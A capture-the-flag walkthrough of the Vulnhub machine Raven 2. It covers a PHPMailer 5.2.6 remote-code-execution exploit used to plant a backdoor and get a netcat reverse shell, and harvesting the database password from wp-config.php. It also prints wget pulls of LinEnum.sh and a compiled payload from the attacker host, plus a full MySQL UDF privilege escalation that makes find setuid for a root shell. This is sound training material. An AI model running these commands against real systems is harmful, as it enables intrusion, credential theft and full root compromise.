E Exploits

Raven 2: Vulnhub Walkthrough

Hello everyone and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2. It is the sequel to previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get the root on target VM.

Table of contents:

  1. Port scanning and IP discovery.
  2. Hitting on port 80 and discovery of WordPress CMS.
  3. Directory enumeration to find a directory “vendor.”
  4. Discovering a file PATH to snag flag 1.
  5. Discovering a file VERSION to snag the PHP version.
  6. Exploiting RCE in PHP version 5.2.6
  7. Making local changes in the exploit code for successful delivery of payload.
  8. Getting a netcat shell using the uploaded payload.
  9. Snagging flag 2 in /var/www
  10. Reading database password from wp-config file.
  11. Running LinEnum.sh to enumerate processes.
  12. Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db
  13. Setting sticky bit on find.
  14. Getting root access.
  15. Snagging flag4 in /root
  16. Manually traversing system to find flag3.

Let’s get started then!

Discovering the active devices on a network using netdiscover and getting the IP address of our victim machine. In this case the IP address holds 192.168.1.101

image

Using nmap on the victim machine we got three ports open 22,80 and 111

image

So we instantly moved to the port 80 and discovered a website of Raven Security.

image

We thought it would be wise to run a directory test before we scan anything else. So we ran a directory buster test to find “vendor” directory in the victim machine.

image

Accessing /vendor the following files and folders came out.

image

Among them a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!

image

There was yet another file worth noting called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6 but look at the previous screen again… A file exists called: PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 was of PHPMailer. So, on a bit of internet surfing we found an RCE exploit for the version!

image

Now we downloaded this python file but don’t run it yet! There are some changes to be made which are highlighted in the screen below.

  1. A coding: utf-8 tag is to be added at the top.
  2. Set the target of vulnerability to 192.168.1.101/contact.php where this vulnerability exists (read PHPMailer’s function).
  3. Set the backdoor’s name. Let it be backdoor.php for now.
  4. Set the local IP in the Subprocess call.
  5. And finally, the location to upload the backdoor in.

image

Now run this python script and wait for the success message.

image

Activate a netcat listener on port 443. It is because the backdoor gives a connection on port 443 as written in the python code (Subprocess call).

image

Upon opening the location of backdoor we immediately got a shell!

Now we imported a proper teletype by using the python one liner and manually traversed to /var/www only to discover flag2!

python –c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt

Now we thought of checking the wordpress directory as we done in the prequel Raven 1.

cd /var/www/html/wordpress
cat wp-config.php

We found the root database password! It was “R@v3nSecurity”

image

Then we changed the active directory to /tmp and imported LinEnum.sh, a script to enumerate many of the basic and advanced linux details.

It was hosted in a folder on our local machine and was imported into the victim machine using wget command.

My local IP address was 192.168.1.109 in this case.

cd /tmp
wget http://192.168.1.109/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

image

We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability! (FOR MORE INFO: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html)

image

So, we searched for a UDF dynamic library exploit and it was named “1518.c” in exploit database.

https://www.exploit-db.com/exploits/1518/

image

The exploits run by compiling the raw C code to .so file and then transferring it to the victim machine and exploiting MySQL vulnerability.

The first step was to compile it.

searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

image

And hence, we transferred this “.so” file in the /tmp directory in victim’s machine.

wget http://192.168.1.109/1518.so
chmod 777 1518.so

image

Now we logged in to the mysql interface.

mysql -u root -p

<entered password>

After getting a MySQL shell, we started exploiting it using the vulnerability we just found

use mysql;

Now, we created a table called “foo”

In this table, we inserted the link to the 1518.so file we just imported from local machine to /tmp directory.

We dumped the same file to /usr/lib/mysql/plugin/ directory (since it was vulnerable)

In the most important step, we created a UDF function named do_system, that will invoke the code that implements the function.

Hence, we are invoking the code “chmod u+s /usr/bin/find” to set the sticky bit on “find”

create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');

image

Now we traversed back to the directory /tmp and executed commands using the find utility.

touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;
cd /root
ls
cat flag4.txt

image

Only flag left to find was flag3.txt. You can do this with find utility but we had a bit of luck and found it manually!

It was lying in /var/www/html/wp-content/uploads/2018/11

We copied it in /var/www/html using cp.

image

Since it was a png file we had to view it on browser.

image

Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Raven 2: Vulnhub Walkthrough appeared first on Hacking Articles.

Read more